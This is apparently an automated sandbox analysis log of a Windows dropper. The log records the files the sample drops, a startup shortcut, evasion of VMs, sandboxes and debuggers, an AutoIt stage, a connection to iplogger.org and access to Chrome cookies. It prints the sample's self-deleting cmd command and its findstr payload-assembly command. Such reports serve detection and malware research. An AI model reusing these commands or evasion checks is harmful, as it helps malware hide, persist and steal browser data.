                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name: .themida
                      Source: IntelRapid.exe.15.drStatic PE information: section name: .boot
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                      Source: wheezy.exe.10.drStatic PE information: real checksum: 0xe94bb should be: 0xe5407
                      Source: lv[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x450fee
                      Source: UAC.dll.10.drStatic PE information: real checksum: 0x0 should be: 0xde12
                      Source: File.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x450fee
                      Source: initial sampleStatic PE information: section name: entropy: 7.97590031918
                      Source: initial sampleStatic PE information: section name: entropy: 7.97590031918
                      Source: C:\Users\user\AppData\Local\Temp\File.exeFile created: C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\File.exeFile created: C:\Program Files (x86)\foler\olader\acppage.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\File.exeFile created: C:\Users\user\AppData\Local\Temp\dislip\parted.exeJump to dropped file
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile created: C:\Users\user\AppData\Local\Temp\File.exeJump to dropped file
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\File.exeFile created: C:\Program Files (x86)\foler\olader\adprovider.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\File.exeFile created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\File.exeFile created: C:\Program Files (x86)\foler\olader\acledit.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeFile created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeJump to dropped file
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E2A51 CompareStringA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,LocalAlloc,GetFileAttributesA,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnkJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Self deletion via cmd deleteShow sources
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Query firmware table information (likely to detect VMs)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 31 > 30
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 46 > 30
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 39 > 30
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 46 > 30
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 46 > 30
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 32 > 30
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 37 > 30
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000Thread sleep count: 46 > 30
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344Thread sleep count: 40 > 30
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344Thread sleep time: -160000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344Thread sleep count: 43 > 30
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344Thread sleep count: 43 > 30
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 1480Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files
                      Source: IntelRapid.exe, 0000001D.00000002.365761146.000001E574EA8000.00000004.00000020.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                      Source: Bisogna.exe.com, 00000018.00000002.584887788.0000000003828000.00000004.00000001.sdmpBinary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW.48.ID
                      Source: IntelRapid.exe, 0000001A.00000002.339502137.000001B5F8B47000.00000004.00000020.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__m
                      Source: Bisogna.exe.com, 00000015.00000003.343298124.0000000001913000.00000004.00000001.sdmpBinary or memory string: l $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
                      Source: Bisogna.exe.com, 00000015.00000002.356329862.000000000452E000.00000004.00000001.sdmpBinary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW
                      Source: Bisogna.exe.com, 00000015.00000003.346272795.00000000018F8000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, l.19.drBinary or memory string: Local $dpjdrFdkImGxcUs = 'YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW'
                      Source: Bisogna.exe.com, 00000018.00000002.586020257.00000000039DE000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: l.19.drBinary or memory string: Local $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
                      Source: Bisogna.exe.com, 00000018.00000002.584960509.000000000384E000.00000004.00000001.sdmpBinary or memory string: cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN
                      Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW (
                      Source: Bisogna.exe.com, 00000015.00000002.355832270.000000000191C000.00000004.00000001.sdmpBinary or memory string: gZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0042B3BE FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406301 FindFirstFileW,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0042B021 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_004238B1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0308092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_030AB271 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00417261 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0042C86D GetProcessHeap,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00417261 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_004173F7 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0041763D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0041D9DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E6ECF SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E6B2F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: iplogger.org
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 88.99.66.31 187
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E1808 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,
                      Source: Bel.wav.13.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_cookies.db VolumeInformation
